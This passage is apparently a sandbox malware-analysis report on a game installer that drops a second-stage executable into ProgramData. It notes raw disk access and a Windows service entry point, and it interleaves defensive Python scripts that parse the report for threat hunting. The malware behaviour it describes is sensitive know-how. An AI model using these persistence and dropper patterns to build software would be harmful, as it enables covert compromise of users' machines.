                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-PIVQ2.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-KCF1P.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-NH7NT.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-58TJN.tmpJump to dropped file
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile created: C:\ProgramData\SpaceXRaces\SpaceXRaces.exeJump to dropped file
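The dropped-file list above is long because Inno Setup writes each payload twice: first under a transient is-XXXXX.tmp name in the target directory, then renamed to its final name (the "(copy)" entries), and the _isetup\ files are the installer's own runtime helpers. The one entry that matters for hunting is the drop whose source is not the installer stub: the installed crtgame.exe writing C:\ProgramData\SpaceXRaces\SpaceXRaces.exe. The script below is an added example, not part of the Joe Sandbox report, that parses "File created" and "Dropped PE file which has not been started" lines of this shape (the sample is constructed from lines in the list above, kept in their extracted form) into an inventory, labels the Inno Setup artifacts, and picks out second-stage drops by source process and location. The buckets, regexes and helper-file names it uses are my assumptions, not the sandbox's.

```python
import re
from collections import Counter
from pathlib import PureWindowsPath

# Constructed sample: nine lines copied in shape from the report (the extraction fuses
# "Source: <process>" onto the action and appends the "Jump to ..." link text).
SAMPLE = r"""
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-FGLVG.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_shfoldr.dllJump to dropped file
Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile created: C:\ProgramData\SpaceXRaces\SpaceXRaces.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\crtgame.exeJump to dropped file
Source: C:\Users\user\Desktop\6hvZpn91O8.exeFile created: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-FGLVG.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_shfoldr.dllJump to dropped file
"""

CREATED, NOT_STARTED = "File created", "Dropped PE file which has not been started"
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*[;|]?\s*"                      # fused, or ';'/'|' separated
    r"(?P<action>" + "|".join(map(re.escape, (CREATED, NOT_STARTED))) + r"):\s*"
    r"(?P<path>.+?)\s*(?:Jump to (?:dropped file|behavior))?\s*$"  # drop link residue
)
INNO_STAGING = re.compile(r"^is-[A-Z0-9]{5}\.tmp$", re.I)   # Inno Setup transient name
# Assumed list of Inno Setup runtime helpers (support files, not payload).
INNO_HELPERS = {"_shfoldr.dll", "_iscrypt.dll", "_isdecmp.dll", "_regdll.tmp", "_setup64.tmp"}


def final_name(path):
    """Joe Sandbox marks the renamed-in-place file as '<name> (copy)'; return the real name."""
    return re.sub(r"\s*\(copy\)$", "", path)


def classify(path):
    """Bucket a dropped path (assumed buckets, not the report's own categories)."""
    p = PureWindowsPath(path)
    parts = [x.lower() for x in p.parts]
    if p.name.lower() in INNO_HELPERS or "_isetup" in parts:
        return "inno_helper"
    if INNO_STAGING.match(p.name):
        return "inno_staging"          # the '(copy)' entry is the file to look at instead
    if "programdata" in parts:
        return "second_stage"          # written outside the install root: hunt for it
    if any(x.startswith("program files") for x in parts):
        return "installed"
    if "temp" in parts:
        return "temp"
    return "other"


def parse(text):
    """Turn report lines into records; lines of other signature types are ignored."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            final = final_name(m["path"])
            rows.append({"src": m["src"], "action": m["action"],
                         "final": final, "kind": classify(final)})
    return rows


def triage(text):
    """Inventory keyed by final path, with a started flag and the second-stage picks."""
    rows = parse(text)
    created = {r["final"]: r for r in rows if r["action"] == CREATED}
    never_started = {r["final"] for r in rows if r["action"] == NOT_STARTED}
    for r in created.values():
        # Only PE files appear in the not-started list, so 'started' means
        # 'not reported as never started': an executed PE, or not a PE at all.
        r["started"] = r["final"] not in never_started
    return {
        "records": created,
        "second_stage": sorted(f for f, r in created.items() if r["kind"] == "second_stage"),
        "by_source": Counter(r["src"] for r in created.values()),
        "kinds": Counter(r["kind"] for r in created.values()),
    }


if __name__ == "__main__":
    t = triage(SAMPLE)
    for f in t["second_stage"]:
        print("HUNT:", f, "<-", t["records"][f]["src"])
    print(dict(t["kinds"]))
```

Run it over the whole report text rather than the sample; the regex accepts both the fused form shown on this page and a "Source: …; File created: …" form. Anything in the "second_stage" list, here SpaceXRaces.exe written by crtgame.exe, is the path to search for on other hosts; the is-XXXXX.tmp names are useless as indicators because Inno Setup generates them per run.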

                  Boot Survival

                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe; Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 4_2_00401A58
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe; Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 6_2_02C2F29C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe; Code function: 4_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,ExitProcess,StartServiceCtrlDispatcherA,4_2_004026F0
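The boot-sector signature above fires on the chain CreateFileA, DeviceIoControl, GetLastError, CloseHandle against \\.\PhysicalDrive0. That chain opens a raw disk handle, but no write API appears in it, so by itself it is as consistent with a disk query (a serial-number read used for machine fingerprinting, for instance) as with an MBR write. The third line, a function that writes registry values and ends in StartServiceCtrlDispatcherA, is the clearer persistence evidence: crtgame.exe can run as a Windows service. As an added example that is not part of the report, the script below parses "Code function" lines of this shape, separates the function id from the device path the extraction fused it onto ("PhysicalDrive04_2_00401A58" is drive 0 plus id 4_2_00401A58, assuming a single-digit drive index), and grades each chain; the API sets used for grading are my assumptions.

```python
import re

# Constructed sample: the three Boot Survival lines in their extracted form, where the
# function id is fused onto the device path.
SAMPLE = r"""
Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive04_2_00401A58
Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive06_2_02C2F29C
Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 4_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,ExitProcess,StartServiceCtrlDispatcherA,4_2_004026F0
"""

ADDR = r"\d+_\d+_[0-9A-Fa-f]{8}"   # Joe Sandbox function id: <process>_<n>_<address>
LINE_RE = re.compile(r"^Source:\s*(?P<src>.+?)\s*[;|]?\s*Code function:\s*(?P<body>.+?)\s*$")
# Non-greedy drive index: stop as soon as a function id, whitespace, comma or end follows.
DEVICE_RE = re.compile(r"\\\\\.\\PhysicalDrive(\d+?)(?=" + ADDR + r"|\s|,|$)")

# Assumed grading sets (mine, not the sandbox's).
WRITE_APIS = {"WriteFile", "WriteFileEx", "NtWriteFile", "ZwWriteFile"}
SERVICE_APIS = {"StartServiceCtrlDispatcherA", "StartServiceCtrlDispatcherW",
                "CreateServiceA", "CreateServiceW"}
REG_WRITE_APIS = {"RegSetValueExA", "RegSetValueExW", "RegSetValueA", "RegSetValueW"}


def parse_chain(line):
    """Split one 'Code function' line into source, function ids, API list and device path."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    body = m["body"]
    device = None
    d = DEVICE_RE.search(body)
    if d:
        device = r"\\.\PhysicalDrive" + d.group(1)
        body = body[:d.start()] + body[d.end():]   # the fused id stays behind for ADDR
    addrs = re.findall(ADDR, body)
    body = re.sub(ADDR, "", body)
    apis = [t.strip() for t in body.split(",") if re.fullmatch(r"\s*[A-Za-z_]\w*\s*", t)]
    return {"src": m["src"], "addrs": addrs, "apis": apis, "device": device}


def assess(line):
    """Grade a chain: raw disk access with or without a write, service entry, registry writes."""
    p = parse_chain(line)
    if p is None:
        return None
    apis = set(p["apis"])
    p["raw_disk"] = p["device"] is not None and any(a.startswith("CreateFile") for a in apis)
    p["disk_write"] = p["raw_disk"] and bool(apis & WRITE_APIS)
    p["service"] = bool(apis & SERVICE_APIS)
    p["registry_write"] = bool(apis & REG_WRITE_APIS)
    if p["disk_write"]:
        p["verdict"] = "write-capable raw disk access: possible boot sector / MBR write"
    elif p["raw_disk"]:
        p["verdict"] = ("raw disk handle opened but no write API in chain: query-only, "
                        "boot sector infection not confirmed by this chain")
    elif p["service"]:
        p["verdict"] = "service entry point" + (" with registry writes" if p["registry_write"] else "")
    else:
        p["verdict"] = "no persistence indicator"
    return p


def summarize(text):
    return [r for r in (assess(l) for l in text.splitlines()) if r]


if __name__ == "__main__":
    for r in summarize(SAMPLE):
        print(r["addrs"][0], r["device"] or "-", r["verdict"])
```

The grading deliberately treats DeviceIoControl as ambiguous: the same open-then-IOCTL pattern serves IOCTL_STORAGE_QUERY_PROPERTY style reads and disk writes alike, and only the control code (not shown in this report) settles which. Confirm a boot-sector write from the sandbox's disk or IOCTL trace, or from the function at 4_2_00401A58 in a disassembler, before reporting it as such.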
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Code function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus,1_2_004241EC
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Code function: 1_2_004241A4 IsIconic,SetActiveWindow,1_2_004241A4
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Code function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418394
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Code function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042286C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Code function: 1_2_004175A8 IsIconic,GetCapture,1_2_004175A8
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Code function: 1_2_00417CDE IsIconic,SetWindowPos,1_2_00417CDE
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Code function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CE0
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Code function: 1_2_00481CB0 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_00481CB0
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Code function: 1_2_0044AEAC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0044AEAC
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe; Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 4_2_00401B54
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe; Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 6_2_02C2F3A0
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe; Window / User API: threadDelayed 9637
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-OMMAA.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-4NPOS.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-FGLVG.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RHF7D.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-BDC3N.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-OJ8GN.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-73F5N.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-FJ939.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-AGPIJ.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_shfoldr.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2CG7G.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\is-4264D.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-5IVSF.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-OF8TE.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2CGLR.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_iscrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-F44SJ.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-C6CS8.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_RegDLL.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-ML5PH.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-ONP9R.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-G7PIK.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-849ND.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-7Q436.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2JPEP.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UT0J0.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-12J2O.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-HASL7.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-766CT.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-IG6J1.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-640V1.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-C1CHO.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-DQCHN.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-6RB4E.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-QECHS.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-KANF7.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-SGP9P.tmpJump to dropped file
